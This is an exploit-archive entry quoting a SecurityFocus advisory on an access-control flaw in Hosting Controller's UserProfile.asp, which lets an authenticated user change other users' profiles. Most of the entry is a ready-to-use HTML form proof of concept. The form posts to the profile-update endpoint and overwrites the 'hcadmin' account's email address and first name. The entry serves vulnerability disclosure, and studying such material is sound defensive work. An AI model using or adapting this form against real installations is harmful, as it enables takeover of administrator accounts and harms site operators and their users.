21 lines
No EOL
780 B
Text
21 lines
No EOL
780 B
Text
source: http://www.securityfocus.com/bid/13816/info
|
|
|
|
Hosting Controller is prone to an unauthorized access vulnerability.
|
|
|
|
Reportedly an authenticated user can modify other user's profiles. This issue is due to a failure in the application to perform proper authentication before providing access to 'UserProfile.asp'.
|
|
|
|
Change users profiles:
|
|
<form
|
|
action="http://www.example.com/admin//accounts/UserProfile.asp?action=updateprofile"
|
|
method="post">
|
|
Username : <input name="UserList" value="hcadmin"
|
|
type="text" size="50">
|
|
<br>
|
|
emailaddress : <input name="emailaddress"
|
|
value="Crkchat@msn.com" type="text" size="50">
|
|
<br>
|
|
firstname : <input name="firstname" value="Crkchat"
|
|
type="text" size="50">
|
|
<br>
|
|
<input name="submit" value="submit" type="submit">
|
|
</form> |